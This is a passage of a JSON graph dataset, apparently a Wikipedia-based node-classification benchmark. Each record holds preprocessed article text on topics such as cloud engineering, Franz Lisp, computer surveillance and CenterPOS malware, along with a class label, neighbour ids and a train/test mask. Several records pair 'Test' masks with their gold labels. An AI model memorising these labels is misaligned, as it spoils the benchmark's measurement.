      4863,
      4883,
      278,
      10392,
      1690,
      3867,
      3996,
      10141,
      5281,
      2213,
      8998,
      4903,
      9256,
      939,
      7983,
      1970,
      3643,
      6588,
      7739,
      8638,
      9791,
      1088,
      3395,
      4165,
      2634,
      2508,
      7515,
      4344,
      3941,
      8554,
      107,
      8824,
      877,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "Test"
  },
  {
    "node_id": 9228,
    "label": 7,
    "text": "Cloud_engineering:cloud engineering cloud engineering application engineering disciplines cloud computing brings systematic approach concerns commercialization standardization governance cloud computing applications practice leverages methods tools engineering conceiving developing operating maintaining cloud computing systems solutions process designing systems necessary leverage power economics cloud resources solve business problems cloud engineering field engineering focuses cloud services software service platform service infrastructure service multidisciplinary method encompassing contributions diverse areas systems engineering software engineering web engineering performance engineering information technology engineering security engineering platform engineering service engineering risk engineering quality engineering nature commodity-like capabilities delivered cloud services inherent challenges business model drive need cloud engineering core discipline elements cloud engineering include professionals work field cloud engineering primarily cloud architects engineers key skills possessed cloud engineering professionals demand skills advanced ict information communication technology rapidly expanded recent years business society transformed emergence internet web ubiquitous media enabling knowledge-based global economy turn created huge demand networked-enabled parallel distributed computing technologies changing way conduct science operate business tackle challenging problems epidemic diseases climate change many platforms available cloud engineering notion cloud engineering context cloud computing sparsely used discussions presentations talks various occasions middle 2000s term cloud engineering formally coined around 2007 concept cloud engineering officially introduced april 2009 various aspects topics subject extensively covered number industry events extensive research conducted specific areas cloud engineering development support cloud patterns cloud business continuity services first ieee international conference cloud engineering ic2e took place march 25–28 2013 second conference held march 10–14 2014",
    "neighbors": [
      4194,
      467,
      4429
    ],
    "mask": "Test"
  },
  {
    "node_id": 9229,
    "label": 8,
    "text": "Phusion_Passenger:phusion passenger phusion passenger informally also known mod_rails mod_rack among ruby community free web server application server support ruby python node.js designed integrate apache http server nginx web server also mode running standalone without external web server phusion passenger supports unix-like operating systems available gem package tarball native linux packages originally designed web applications built ruby rails framework later extended support arbitrary ruby web frameworks rack interface later versions also added support python wsgi interface well support node.js 2012 phusion announced phusion passenger enterprise paid commercial variant phusion passenger wide array premium features phusion stated open source variant continue developed maintained along enterprise variant phusion passenger preferred deployment setup ruby rails applications 2016 recommended ruby rails authors 2009 2013 combination ruby 2.0 now-discontinued ruby enterprise edition phusion passenger claimed capable reducing rails memory consumption 33 well increasing performance",
    "neighbors": [
      1920,
      4485,
      7430,
      1802,
      10506,
      2191,
      7695,
      1937,
      11154,
      7443,
      1556,
      5397,
      10771,
      9245,
      8350,
      7457,
      3746,
      8994,
      10020,
      3237,
      9125,
      9726,
      11682,
      7338,
      9387,
      44,
      7212,
      10026,
      10284,
      10800,
      11439,
      4658,
      564,
      2485,
      4277,
      5945,
      6714,
      1852,
      1468,
      4797,
      5567,
      6338,
      8644,
      1991,
      11208,
      5578,
      11466,
      3920,
      11134,
      595,
      1363,
      3545,
      5593,
      5849,
      10973,
      6366,
      865,
      1379,
      2404,
      4837,
      7784,
      11625,
      8554,
      6379,
      9580,
      9834,
      11376,
      8689,
      9841,
      8691,
      2804,
      10611,
      11386,
      124,
      3966
    ],
    "mask": "None"
  },
  {
    "node_id": 9230,
    "label": 4,
    "text": "The_Radio_Hacker's_Codebook:radio hacker codebook radio hacker codebook book computer enthusiasts written george sassoon book explains receive international radioteletype signals convert circuit decode microcomputer case book computer superseded research machines 380z programs functions given written machine code basic however legal moral issues relating intercepting messages included radioteletype subject included fec automatic repeat request used maritime radiocommunications book also include exposition encryption including public key rsa cipher presciently expounds lack privacy cashless society code examples also given using sharp pc-320i encode decode german enigma machine books claims enigma kept secret long periods understanding could compromise american m-209 cipher machine still sold countries encryption topics covered include data encryption standard vernam cipher one-time pad pseudo random number generators transposition ciphers substitution ciphers radio hacker codebook idiosyncratic revealing personal quest sassoon decrypt military signals radio spectrum however would chance decode modern encryption described book radio hacker codebook broke ground low price technical computing book sold £6.95 well typical £10+ price computing books time published duckworth 239 pages",
    "neighbors": [
      2752
    ],
    "mask": "None"
  },
  {
    "node_id": 9231,
    "label": 9,
    "text": "Franz_Lisp:franz lisp computer programming franz lisp discontinued lisp programming language system written university california berkeley uc berkeley ucb professor richard fateman several students based largely maclisp distributed berkeley software distribution bsd digital equipment corporation dec vax minicomputer piggybacking popularity bsd package franz lisp probably widely distributed used lisp system 1970s 1980s name pun composer franz liszt written specifically host running macsyma computer algebra system vax project began end 1978 soon uc berkeley took delivery first vax 11/780 named ernie covax ernie kovacs first many systems pun names ucb franz lisp available free charge educational sites also distributed eunice berkeley unix emulator ran vax vms time franz lisp creation macsyma computer algebra system ran mainly dec pdp-10 computer limited address space caused difficulties attempted remedies included ports maclisp multics lisp machines even successful would solutions massachusetts institute technology mit machines costly uncommon franz lisp first example framework large lisp programs could run outside lisp machines environment macsyma considered large program ported franz lisp macsyma distributed 50 sites license restricted mit interest making macsyma proprietary vax macsyma ran franz lisp called vaxima symbolics inc. bought commercial rights macsyma mit sell along lisp machines eventually compelled sell macsyma also dec vax sun microsystems computers paying royalties university california use franz lisp lisp implementations vax mit nil never fully functional university utah portable standard lisp dec vax lisp xerox interlisp-vax le lisp 1982 port franz lisp motorola 68000 processor begun particular ported prototype sun-1 made sun microsystems ran variant berkeley software distribution bsd unix called sunos 1986 purdue university franz lisp ported cci power 6/32 platform code named tahoe major contributors franz lisp uc berkeley john k. foderaro keith sklower kevin layer company formed provide support franz lisp called franz inc. founders richard fateman john foderaro fritz kunze kevin layer keith sklower associated uc berkeley development research franz lisp continued years acceptance common lisp greatly reduced need franz lisp first product franz inc. franz lisp running various motorola 68000-based workstations port franz lisp even done vax vms lawrence berkeley national laboratory however almost immediately franz inc. began work implementation common lisp allegro common lisp franz lisp interpreter written c franz lisp bootstrapped solely using c compiler franz lisp compiler written entirely franz lisp called liszt completing pun name composer franz liszt notable features franz lisp arrays lisp interchangeable arrays fortran foreign function interface ffi allowed interoperation languages binary level many implementation methods borrowed maclisp bibop memory organization big bag pages small integers represented uniquely pointers fixed values fields fast arithmetic",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      7269,
      8293,
      2666,
      6772,
      5751,
      7805,
      9345,
      1159,
      9865,
      7819,
      6797,
      9877,
      5803,
      9391,
      2225,
      6840,
      7867,
      4799,
      10436,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      1301,
      5397,
      8474,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3389,
      3408,
      6994,
      11604,
      1365,
      2392,
      10083,
      6502,
      11625,
      5492,
      3446,
      3960,
      377,
      4474,
      10104,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      9151,
      7616,
      5569,
      6594,
      9665,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      9714,
      2035,
      7670,
      11255,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9232,
    "label": 1,
    "text": "Spindling:spindling computers spindling allocation different files e.g. data files index files database different hard disks practice usually reduces contention read write resources thus increasing system performance word comes spindle axis hard disks spin",
    "neighbors": [
      1801,
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 9233,
    "label": 4,
    "text": "Computer_and_network_surveillance:computer network surveillance computer network surveillance monitoring computer activity data stored hard drive data transferred computer networks internet monitoring often carried covertly may completed governments corporations criminal organizations individuals may may legal may may require authorization court independent government agencies computer network surveillance programs widespread today almost internet traffic monitored surveillance allows governments agencies maintain social control recognize monitor threats prevent investigate criminal activity advent programs total information awareness program technologies high-speed surveillance computers biometrics software laws communications assistance law enforcement act governments possess unprecedented ability monitor activities citizens however many civil rights privacy groups reporters without borders electronic frontier foundation american civil liberties union expressed concern increasing surveillance citizens end even already mass surveillance society limited political and/or personal freedoms fear led numerous lawsuits hepting v. hacktivist group anonymous hacked government websites protest considers draconian surveillance vast majority computer surveillance involves monitoring data traffic internet example united states communications assistance law enforcement act mandates phone calls broadband internet traffic emails web traffic instant messaging etc available unimpeded real-time monitoring federal law enforcement agencies packet capture also known packet sniffing monitoring data traffic computer network data sent computers internet networks takes form small chunks called packets routed destination assembled back complete message packet capture appliance intercepts packets may examined analyzed computer technology needed perform traffic analysis sift intercepted data look important/useful information communications assistance law enforcement act u.s. telecommunications providers required install packet capture technology federal law enforcement intelligence agencies able intercept customers broadband internet voice internet protocol voip traffic far much data gathered packet sniffers human investigators manually search thus automated internet surveillance computers sift vast amount intercepted internet traffic filtering reporting investigators bits information interesting example use certain words phrases visiting certain types web sites communicating via email chat certain individual group billions dollars per year spent agencies information awareness office nsa fbi development purchase implementation operation systems intercept analyze data extracting information useful law enforcement intelligence agencies similar systems used iranian secret police identify suppress dissidents technology allegedly installed german siemens ag finnish nokia internet rapid development become primary form communication people potentially subject internet surveillance advantages disadvantages network monitoring instance systems described web 2.0 greatly impacted modern society tim ’ reilly first explained concept web 2.0 stated web 2.0 provides communication platforms user generated self-produced content motivating people communicate friends online however internet surveillance also disadvantage one researcher uppsala university said web 2.0 surveillance directed large user groups help hegemonically produce reproduce surveillance providing user-generated self-produced content characterize web 2.0 surveillance mass self-surveillance surveillance companies monitor people focused work entertainment yet employers also monitor employees order protect company assets control public communications importantly make sure employees actively working productive emotionally affect people cause emotions like jealousy research group states ... set test prediction feelings jealousy lead ‘ creeping ’ partner facebook women particularly likely engage partner monitoring response jealousy study shows women become jealous people online group virtual assistant become social integration lives currently virtual assistant amazon alexa call 911 local services constantly listening command recording parts conversations help improve algorithms law enforcement able called using virtual assistant law enforcement would able access information saved device device connected home internet law enforcement would exact location individual calling law enforcement virtual assistance devices popular many debate lack privacy devices listening every conversation owner even owner talking virtual assistant device still listening conversation hopes owner need assistance well gather data corporate surveillance computer activity common data collected often used marketing purposes sold corporations also regularly shared government agencies used form business intelligence enables corporation better tailor products and/or services desirable customers data also sold corporations use aforementioned purpose used direct marketing purposes targeted advertisements ads targeted user search engine analyzing search history emails use free webmail services kept database one important component prevention establishing business purposes monitoring may include following second component prevention determining ownership technology resources ownership firm networks servers computers files e-mail explicitly stated distinction employee personal electronic devices limited proscribed owned firm instance google search stores identifying information web search ip address search phrase used stored database 18 months google also scans content emails users gmail webmail service order create targeted advertising based people talking personal email correspondences google far largest internet advertising agency—millions sites place google advertising banners links websites order earn money visitors click ads page containing google advertisements adds reads modifies cookies visitor computer cookies track user across sites gather information web surfing habits keeping track sites visit sites information along information email accounts search engine histories stored google use build profile user deliver better-targeted advertising united states government often gains access databases either producing warrant simply asking department homeland security openly stated uses data collected consumer credit direct marketing agencies augmenting profiles individuals monitoring addition monitoring information sent computer network also way examine data stored computer hard drive monitor activities person using computer surveillance program installed computer search contents hard drive suspicious data monitor computer use collect passwords and/or report back activities real-time operator internet connection keylogger example type program normal keylogging programs store data local hard drive programmed automatically transmit data network remote computer web server multiple ways installing software common remote installation using backdoor created computer virus trojan tactic advantage potentially subjecting multiple computers surveillance viruses often spread thousands millions computers leave backdoors accessible network connection enable intruder remotely install software execute commands viruses trojans sometimes developed government agencies cipav magic lantern often however viruses created people spyware installed marketing agencies used gain access security breaches create another method cracking computer gain access network attacker install surveillance software remotely servers computers permanent broadband connections vulnerable type attack another source security cracking employees giving information users using brute force tactics guess password one also physically place surveillance software computer gaining entry place computer stored install compact disc floppy disk thumbdrive method shares disadvantage hardware devices requires physical access computer one well-known worm uses method spreading stuxnet one common form surveillance create maps social networks based data social networking sites well traffic analysis information phone call records nsa call database internet traffic data gathered calea social network maps data mined extract useful information personal interests friendships affiliations wants beliefs thoughts activities many u.s. government agencies defense advanced research projects agency darpa national security agency nsa department homeland security dhs currently investing heavily research involving social network analysis intelligence community believes biggest threat u.s. comes decentralized leaderless geographically dispersed groups types threats easily countered finding important nodes network removing requires detailed map network jason ethier northeastern university study modern social network analysis said following scalable social network analysis program developed information awareness office shown possible monitor computers distance commercially available equipment detecting radiation emitted crt monitor form computer surveillance known tempest involves reading electromagnetic emanations computing devices order extract data distances hundreds meters ibm researchers also found computer keyboards key emits slightly different noise pressed differences individually identifiable conditions possible log key strokes without actually requiring logging software run associated computer 2015 lawmakers california passed law prohibiting investigative personnel state force businesses hand digital communication without warrant calling electronic communications privacy act time california state senator jerry hill introduced bill making law enforcement agencies disclose information usage information stingray phone tracker device law took effect january 2016 require cities operate new guidelines relation law enforcement use device legislators holding public office disagreed technology warrantless tracking city wants use device must heard public hearing cities pulled using stingray santa clara county also shown adi shamir et al. even high frequency noise emitted cpu includes information instructions executed policeware software designed police citizens monitoring discussion interaction citizens within u.s. carnivore first incarnation secretly installed e-mail monitoring software installed internet service providers networks log computer communication including transmitted e-mails magic lantern another application time running targeted computer trojan style performing keystroke logging cipav deployed fbi multi-purpose spyware/trojan clipper chip formerly known myk-78 small hardware chip government install phones designed nineties intended secure private communication data reading voice messages encoded decode clipper chip designed clinton administration “ …protect personal safety national security developing information anarchy fosters criminals terrorists foreign foes. ” government portrays solving secret codes cryptographic age technology created thus raised controversy public clipper chip thought next “ big brother ” tool led failure clipper proposal even though many attempts consumer broadband digital television promotion act cbdtpa bill proposed united states congress cbdtpa known security systems standards certification act sssca draft form killed committee 2002 cbdtpa become law would prohibited technology could used read digital content copyright music video e-books without digital rights management drm prevented access material without permission copyright holder german-speaking countries spyware used made government sometimes called govware countries like switzerland germany legal framework governing use software known examples include swiss minipanzer megapanzer german r2d2 trojan surveillance censorship different surveillance performed without censorship harder engage censorship without form surveillance even surveillance lead directly censorship widespread knowledge belief person computer use internet surveillance lead self-censorship march 2013 reporters without borders issued special report internet surveillance examines use technology monitors online activity intercepts electronic communication order arrest journalists citizen-journalists dissidents report includes list state enemies internet bahrain china iran syria vietnam countries whose governments involved active intrusive surveillance news providers resulting grave violations freedom information human rights computer network surveillance increase countries report also includes second list corporate enemies internet amesys france blue coat systems u.s. gamma uk germany hacking team italy trovicor germany companies sell products liable used governments violate human rights freedom information neither list exhaustive likely expanded future protection sources longer matter journalistic ethics journalists equip digital survival kit exchanging sensitive information online storing computer hard-drive mobile phone individuals associated high-profile rights organizations dissident groups protest groups reform groups urged take extra precautions protect online identities",
    "neighbors": [
      3072,
      10756,
      10245,
      9227,
      3088,
      8726,
      9242,
      9761,
      9256,
      9771,
      1070,
      10297,
      3643,
      7739,
      9791,
      1088,
      4165,
      7759,
      4689,
      615,
      2151,
      3688,
      107,
      2162,
      4725,
      5749,
      3703,
      119,
      8824,
      5245,
      6786,
      5764,
      9356,
      1169,
      4245,
      150,
      10392,
      1690,
      1692,
      5281,
      1189,
      2213,
      10417,
      9909,
      10935,
      4797,
      8387,
      197,
      6344,
      7887,
      208,
      7893,
      4314,
      5351,
      1776,
      4344,
      3320,
      4863,
      1279,
      3843,
      7441,
      8978,
      4883,
      278,
      7961,
      3867,
      7965,
      1317,
      4389,
      8998,
      300,
      3395,
      2887,
      4435,
      3924,
      7515,
      5472,
      5986,
      3941,
      11621,
      7527,
      877,
      6000,
      7541,
      9591,
      7044,
      1930,
      9102,
      5531,
      10141,
      3495,
      939,
      11695,
      1970,
      4023,
      6588,
      8638,
      3520,
      4033,
      2508,
      3532,
      3032,
      10208,
      9187,
      7652,
      4595,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9234,
    "label": 2,
    "text": "OLE_DB_provider:ole db provider ole db provider software component ole db api designed microsoft enables ole db consumer interact data source ole db providers analogous odbc drivers jdbc drivers ado.net data providers ole db providers created access simple data stores text file spreadsheet complex databases oracle microsoft sql server sybase ase many others also provide access hierarchical data stores email systems however different data store technologies different capabilities every ole db provider implement every possible interface available ole db standard capabilities available implemented use com objects ole db provider map data store technologies functionality particular com interface microsoft describes availability interface provider-specific may applicable depending data store technology involved note also providers may augment capabilities data store capabilities known services microsoft parlance example microsoft ships ole db providers part mdac jet kits simba technologies ships simbaprovider sdk used build custom ole db olap providers multi-dimensional star schema database connectivity openlink software ships components supporting ole db access number data sources including several sql dbms well bridges odbc- jdbc-accessible data sources",
    "neighbors": [
      10243,
      10769,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      4771,
      7846,
      10413,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      270,
      6927,
      9491,
      11030,
      5401,
      4384,
      2854,
      11559,
      10024,
      10026,
      11570,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      7100,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 9235,
    "label": 3,
    "text": "MStar:mstar mstar semiconductor inc. taiwanese fabless semiconductor company specializing mixed-mode integrated circuit technologies based hsinchu hsien mstar made hardware multimedia wireless communications form display ics mixed-mode i.e combining analog digital functions asic/ips addition chip sets gsm mobile handsets mstar employed approx 1300 10 branches worldwide company revenue around us 1067 million 2010 growth substantial revenue 2005 us 175 million mstar listed taiwan stock exchange code 3697 mstar often referred little-m chinese community contrary part bigger semiconductor company big-m a.k.a mediatek mstar spin-off 2-1 stock split system general technology may 2002 power ic product line stayed system general technology employees display rfid product lines transferred new spin-off spin-off 1-2 stock swap taken exchange two companies back corresponding shareholders chairman mstar wayne liang 梁公偉 steve yang 楊偉毅 president co-founder 2004 involved court case ruling international trade commission itc mstar semiconductor found guilty infringing patent held genesis microchip method improve images liquid-crystal-display lcd monitors flat screen tvs 22 june 2012 mediatek inc. announced purchased 212 million 254 million shares mstar 40 48 outstanding shares 0.794 mediatek shares nt 1 cash per mstar share",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      2838,
      5417,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      2383,
      9042,
      2388,
      6495,
      1377,
      5475,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 9236,
    "label": 6,
    "text": "Amiga_Old_File_System:amiga old file system amiga old file system filesystem amigaos amiga fast file system even though used 512-byte blocks reserved first small portion block metadata leaving actual data block capacity 488 bytes per block n't suitable anything except floppy disks soon replaced originally known amiga file system came filesystem tripos formed basis first versions amigados received nickname old original file system fast file system released amigaos 1.3 ofs good repairing filesystem event problem although so-called diskdoctor provided commodore quickly earned name diskdestroyer could repair no-dos type autostart disks provided third-party software manufacturers bootable disks games idea create non-standard autobootable disks born primitive attempt prevent copy disks avoid loading launch amiga dos order directly access amiga graphic audio memory chipsets diskdoctor fact changed autostart disks bootblocks standard amigados-based ones renaming disk lazarus namedisk made autostart disk unusable amiga uses mfm encoding/decoding default handling floppy disks 80 cylinders amiga floppy disk cylinder 2 mfm tracks one side disk double density dd disks 11 sectors per mfm track high density hd disks 22 sectors geometry amiga floppy disk follows dd disk 11 2 80 1760 0 1759 blocks hd disk 22 2 80 3520 blocks amiga stores 880 kib dd disk 1760 kib hd floppy disk prior amigaos 3.5 amigados file handles maintained 32-bit wide offset parameter unsigned telling start next read write operation biggest size single amiga file operating systems therefore comes 2 4 gib amiga os 3.5 file handles may reference 2 16 eib files however ofs-formatted disks continue retain 32-bit limitations intrinsic limitation format recorded media ofs datablock stores block size bsize-24 bytes i.e normally 488 bytes frequently used bsize 512 bytes rootblock located physical middle media block number 880 dd disks block 1760 hds helps minimize seek times exact calculation stored follows rootblock contains information disk name formatting date etc also contains information accessing files/directories/links located uppermost root directory characters '/ forbidden file volume names |^+ =\\- letters diacritical marks like âè allowed date fields root block blocks structured form days mins ticks days field contains number days since january 1 1978 mins number minutes passed since midnight ticks expressed 1/50s second day value zero considered illegal programs since days value stored 32-bit number amiga filesystem inherent year 2000 problem year 2038 problem reach file directory link amigados uses hash function calculate 32-bit word disk block use pointer hash bucket list turn contains file directory link record bucket list used support filesystem objects names hash offset example file_1a file_24 file_5u hash value filename characters lowercase uppercase case sensitive accessed say myfile myfile directory refer file files composed file header block contains information file size last access time data block pointers etc data blocks contain actual data file header block contains bsize/4-56 data block pointers amounts 72 entries usual 512 byte blocks file larger file extension blocks allocated hold data block pointers file extension blocks organised linked list starts file header block 'extension field",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9249,
      9762,
      5158,
      11323,
      8772,
      5709,
      6233,
      5729,
      4708,
      5736,
      11370,
      9836,
      7789,
      5743,
      9333,
      6263,
      9335,
      9848,
      9343,
      8832,
      7818,
      139,
      654,
      5264,
      2193,
      2194,
      2197,
      2199,
      11419,
      3233,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      8369,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      1742,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      1775,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      4387,
      5413,
      3368,
      9004,
      302,
      6961,
      11076,
      3909,
      2378,
      10570,
      4431,
      850,
      6995,
      346,
      2395,
      2397,
      10596,
      11123,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      8618,
      4012,
      1454,
      6062,
      432,
      11184,
      8114,
      7603,
      8115,
      1464,
      1978,
      6075,
      8643,
      4564,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 9237,
    "label": 2,
    "text": "Linux_Phone_Standards_Forum:linux phone standards forum linux phone standards forum lips forum consortium group companies create standards use linux mobile devices main goal lips forum create application programming interfaces apis allow developers build applications inter-operate across linux handsets made manufacturers founding members include arm ltd cellon esmertec france telecom telecom italia fsm labs huawei jaluna mizi research montavista software open-plug palmsource march 2007 palmsource changed name parent company access inc newer members include texas instruments trolltech asa movial oy british telecom joined lips forum september 2007 september 2007 lips forum announced going align efforts open mobile alliance june 2008 lips forum announced would join limo foundation thereby cease exist separate organization",
    "neighbors": [
      4225,
      7938,
      7812,
      8326,
      4360,
      4493,
      2195,
      11155,
      1813,
      10780,
      1694,
      3618,
      4011,
      9646,
      823,
      2235,
      9660,
      10303,
      10817,
      5067,
      8147,
      1761,
      4841
    ],
    "mask": "Test"
  },
  {
    "node_id": 9238,
    "label": 3,
    "text": "Round-robin_DNS:round-robin dns round-robin dns technique load distribution load balancing fault-tolerance provisioning multiple redundant internet protocol service hosts e.g. web server ftp servers managing domain name system dns responses address requests client computers according appropriate statistical model simplest implementation round-robin dns works responding dns requests single potential ip address one list potential ip addresses corresponding several servers host identical services order ip addresses list returned basis term round robin dns response ip address sequence list permuted usually basic ip clients attempt connections first address returned dns query different connection attempts clients would receive service different providers thus distributing overall load among servers standard procedure deciding address used requesting application resolvers attempt re-order list give priority numerically closer networks desktop clients try alternate addresses connection timeout 30–45 seconds round-robin dns often used load balance requests number web servers example company one domain name three identical copies web site residing three servers three different ip addresses one user accesses home page sent first ip address second user accesses home page sent next ip address third user sent third ip address case ip address given goes end list fourth user therefore sent first ip address forth round-robin dns name rare occasions referred rotor due rotation alternative records although easy implement round-robin dns number drawbacks arising record caching dns hierarchy well client-side address caching reuse combination difficult manage round-robin dns solely relied upon service availability service one addresses list fails dns continue hand address clients still attempt reach inoperable service also may best choice load balancing since merely alternates order address records time name server queried consideration transaction time server load network congestion etc round-robin dns load balancing works best services large number uniformly distributed connections servers equivalent capacity otherwise load distribution methods exist overcome limitations example modified dns servers lbnamed routinely poll mirrored servers availability load factor server reply required server temporarily removed dns pool reports operating within specs",
    "neighbors": [
      5472,
      225,
      277,
      2887
    ],
    "mask": "None"
  },
  {
    "node_id": 9239,
    "label": 3,
    "text": "Compaq_Presario_C502TU:compaq presario c502tu compaq presario c502tu notebook computer presario c500 series first produced 2007 series design based compaq presario c300 series compaq presario c500 notebook pc series specifications",
    "neighbors": [
      6765
    ],
    "mask": "Test"
  },
  {
    "node_id": 9240,
    "label": 4,
    "text": "Courage_Foundation:courage foundation courage foundation trust fundraising legal defence individuals whistleblowers journalists founded august 9 2013 'journalistic source protection defence fund wikileaks site later rebranded june 2014 trust accepts donations bitcoin maintains tor hidden service individuals supported trust advisers include pentagon papers military analyst daniel ellsberg former nsa executive thomas drake former mi5 british intelligence officer whistleblower annie machon member chaos computer club andy müller-maguhn guatemala human rights lawyer renata avila pussy riot courage trustees renata avila susan benn john pilger dame vivienne westwood courage acting director wikileaks member sarah harrison",
    "neighbors": [
      8640,
      10726,
      3495,
      5385,
      9965,
      7887,
      82,
      5426,
      2683,
      4956,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 9241,
    "label": 8,
    "text": "List_of_augmented_browsing_software:list augmented browsing software",
    "neighbors": [
      1863,
      1129,
      8588,
      5078,
      5114,
      8923
    ],
    "mask": "Train"
  },
  {
    "node_id": 9242,
    "label": 4,
    "text": "CenterPOS_Malware:centerpos malware centerpos also known cerebrus point sale pos malware discovered cyber security experts discovered september 2015 along kinds pos malware newposthings blackpos alina two versions released developer responsible version 1.7 version 2.0 centerpos 2.0 similar functionality centerpos version 1.7 2.0 variant centerpos malware added effective features addition configuration file storing information command control server centerpos used target retailers order illegally obtain payment card information using memory scraper uses two distinct modes scrape store information smart scan normal scan normal scan mode malware looks processes device determines ones currently running processes named system system idle process idle contain keywords microsoft mozilla process meets criteria list malware search memory regions within process searching credit card data regular expressions regular expression list smart scan mode malware starts performing normal scan process regular expression match added smart scan list first pass malware search processes smart scan list malware contains functionality allows cybercriminals create configuration file centerpos malware searches configuration file contains c c information unable find configuration file asks password password entered correct payloads functions create configuration file malware different point sale system malware separate component called builder create payload centerpos malware looks credit debit card information smart scan mode encrypts scraped data using triple des encryption memory scraped data sent operator malware separate http post request",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      8206,
      9233,
      8978,
      4863,
      4883,
      278,
      10392,
      1690,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      3629,
      1970,
      3643,
      6588,
      4797,
      7739,
      9791,
      1088,
      3395,
      4165,
      10309,
      6091,
      2508,
      6360,
      7515,
      4344,
      3941,
      107,
      877,
      3320,
      2041,
      10364,
      5245,
      2558,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 9243,
    "label": 3,
    "text": "Split-brain_(computing):split-brain computing split-brain computer term based analogy medical split-brain syndrome indicates data availability inconsistencies originating maintenance two separate data sets overlap scope either servers network design failure condition based servers communicating synchronizing data last case also commonly referred network partition although term split-brain typically refers error state split-brain dns split-horizon dns sometimes used describe deliberate situation internal external dns services corporate network communicating separate dns name spaces administered external computers internal ones requires double administration domain overlap computer names risk fully qualified domain name fqdn may ambiguously occur name spaces referring different computer ip addresses high-availability clusters usually use heartbeat private network connection used monitor health status node cluster example split-brain syndrome may occur private links go simultaneously cluster nodes still running one believing one running data sets cluster may randomly serve clients idiosyncratic data set updates without coordination data sets may lead data corruption data inconsistencies might require operator intervention cleanup davidson et al. surveying several approaches handle problem classify either optimistic pessimistic optimistic approaches simply let partitioned nodes work usual provides greater level availability cost sacrificing correctness problem ended automatic manual reconciliation might required order cluster consistent state one current implementation approach hazelcast automatic reconciliation key-value store pessimistic approaches sacrifice availability exchange consistency network partitioning detected access sub-partitions limited order guarantee consistency typical approach described coulouris et al. use quorum-consensus approach allows sub-partition majority votes remain available remaining sub-partitions fall auto-fencing mode one current implementation approach one used mongodb replica sets another implementation galera replication mariadb mysql modern commercial general-purpose ha clusters typically use combination heartbeat network connections cluster hosts quorum witness storage challenge two-node clusters adding witness device adds cost complexity even implemented cloud without heartbeat fails cluster members determine active clusters without quorum member fails even members normally assign primary secondary statuses hosts least 50 probability 2-node ha cluster totally fail human intervention provided prevent multiple members becoming active independently either directly conflicting corrupting data",
    "neighbors": [
      1701,
      2887,
      8683,
      7022,
      4274,
      10102,
      3927
    ],
    "mask": "Test"
  },
  {
    "node_id": 9244,
    "label": 2,
    "text": "Android_Nougat:android nougat android nougat codenamed android n development seventh major version 14th original version android operating system first released alpha test version march 9 2016 officially released august 22 2016 nexus devices first receive update lg v20 first smartphone released nougat nougat introduces notable changes operating system development platform including ability display multiple apps on-screen split-screen view support inline replies notifications expanded doze power-saving mode restricts device functionality screen period time additionally platform switched openjdk-based java environment received support vulkan graphics rendering api seamless system updates supported devices nougat received positive reviews new app notification format received particular praise multitasking interface seen positive change reviewers experienced incompatible apps critics mixed experiences doze power-saving mode faster app installs tweaks user interface also reviewed positively 19.2 devices access google play run nougat 11.4 android 7.0 api 24 7.8 android 7.1 api 25 release internally codenamed new york cheesecake march 9 2016 ahead google i/o developer conference google released first alpha version android n part new android beta program intended testing developers enthusiasts official release summer developer preview builds compatible current google nexus devices 5x 6p 6 9 pixel c nexus player android beta program introduced allows testers opt-in over-the-air updates new beta versions released april 13 